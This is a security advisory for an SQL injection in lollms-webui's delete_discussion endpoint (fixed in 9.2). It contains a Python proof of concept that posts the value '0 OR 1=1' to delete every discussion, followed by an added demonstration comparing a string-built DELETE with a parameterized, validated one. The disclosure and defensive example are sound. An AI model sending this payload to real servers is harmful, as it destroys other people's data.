SQL Injection in lollms-webui leads to denial of service
Affected versions: (,9.1]. Fixed in 9.2.
An SQL injection condition exists in delete_discussion(), allowing a malicious actor to delete all discussions and message data from the application. This vulnerability can be exploited simply by sending a crafted HTTP POST request to the /delete_discussion endpoint, which calls the vulnerable internal delete_discussion() function.
# PoC.py
import requests

IP_ADDRESS = "aaa.bbb.ccc.ddd"  # replace me
PORT = 9600

# The "id" value is what ends up in the SQL statement built by delete_discussion()
data = {
    "id": "0 OR 1=1",
    "client_id": 0
}

response = requests.post(f"http://{IP_ADDRESS}:{PORT}/delete_discussion", json=data)
print(response.json())
No mitigations are supplied for this issue.
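
The injection class described above, as an added example (not lollms-webui's code and not its 9.2 fix): a string-built DELETE beside a validated, parameterized one, run against a constructed in-memory SQLite database. The schema, the function names and the assumption that the id is formatted into the SQL text are hypothetical, since the page does not show the body of delete_discussion().

```python
import sqlite3

def make_db():
    """Constructed in-memory database with a hypothetical schema (not the project's)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE discussion (id INTEGER PRIMARY KEY, title TEXT);"
        "CREATE TABLE message (id INTEGER PRIMARY KEY, discussion_id INTEGER, content TEXT);"
    )
    db.executemany("INSERT INTO discussion VALUES (?, ?)", [(1, "a"), (2, "b"), (3, "c")])
    db.executemany("INSERT INTO message VALUES (?, ?, ?)",
                   [(1, 1, "m1"), (2, 2, "m2"), (3, 3, "m3")])
    return db

def delete_discussion_unsafe(db, discussion_id):
    # Assumed vulnerable pattern: the request value is formatted into the SQL text,
    # so "0 OR 1=1" turns the WHERE clause into a condition that is true for every row.
    db.execute(f"DELETE FROM message WHERE discussion_id = {discussion_id}")
    db.execute(f"DELETE FROM discussion WHERE id = {discussion_id}")

def delete_discussion_safe(db, discussion_id):
    # Reject anything that is not an integer id before touching the database.
    if isinstance(discussion_id, bool) or not isinstance(discussion_id, int):
        raise ValueError("discussion id must be an integer")
    # Bound parameters are passed as data and are never parsed as SQL.
    db.execute("DELETE FROM message WHERE discussion_id = ?", (discussion_id,))
    db.execute("DELETE FROM discussion WHERE id = ?", (discussion_id,))

def remaining(db):
    """Return (discussion rows, message rows) still present."""
    d = db.execute("SELECT COUNT(*) FROM discussion").fetchone()[0]
    m = db.execute("SELECT COUNT(*) FROM message").fetchone()[0]
    return d, m

def run_demo():
    payload = "0 OR 1=1"  # the "id" value from the PoC on this page
    db = make_db()
    delete_discussion_unsafe(db, payload)
    unsafe_result = remaining(db)      # every row is gone
    db = make_db()
    try:
        delete_discussion_safe(db, payload)
        rejected = False
    except ValueError:
        rejected = True                # payload never reaches the database
    return unsafe_result, rejected, remaining(db)

if __name__ == "__main__":
    print(run_demo())
```

Binding alone already neutralizes the payload, because the whole string is compared as a single value; the type check additionally turns the malformed request into an explicit error instead of a silent no-op.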